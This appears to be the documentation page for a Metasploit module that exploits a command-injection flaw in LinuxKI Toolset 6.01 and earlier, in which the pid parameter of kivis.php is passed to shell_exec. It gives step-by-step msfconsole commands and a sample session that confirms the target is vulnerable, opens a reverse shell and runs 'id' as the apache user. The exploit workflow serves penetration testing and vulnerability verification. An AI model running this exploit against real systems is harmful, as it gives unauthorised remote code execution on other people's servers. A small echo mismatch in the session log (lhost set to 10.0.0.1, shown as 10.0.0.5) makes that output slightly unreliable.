numanturle
1.6 KiB
1.6 KiB
Vulnerable Application
LinuxKI Toolset <= 6.01
This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
To test this application, you need to download the version 6.01 here. Do not forget to change this URL inside the Dockerfile with this one.
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/linux/http/linuxki_rce - Do:
set RHOSTS - Do:
set LHOST - Do:
run - You should get a shell.
Options
TARGETURI
The directory where LinuxKI Toolset is installed
Scenarios
LinuxKI Toolset v6.01
msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
rhosts => 10.0.0.1
msf5 exploit(linux/http/linuxki_rce) > set rport 8080
rport => 8080
msf5 exploit(linux/http/linuxki_rce) > check
[+] 10.0.0.1:8080 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.1
lhost => 10.0.0.5
msf5 exploit(linux/http/linuxki_rce) > run
[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Sending exploit...
[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300
id
uid=48(apache) gid=48(apache) groups=48(apache)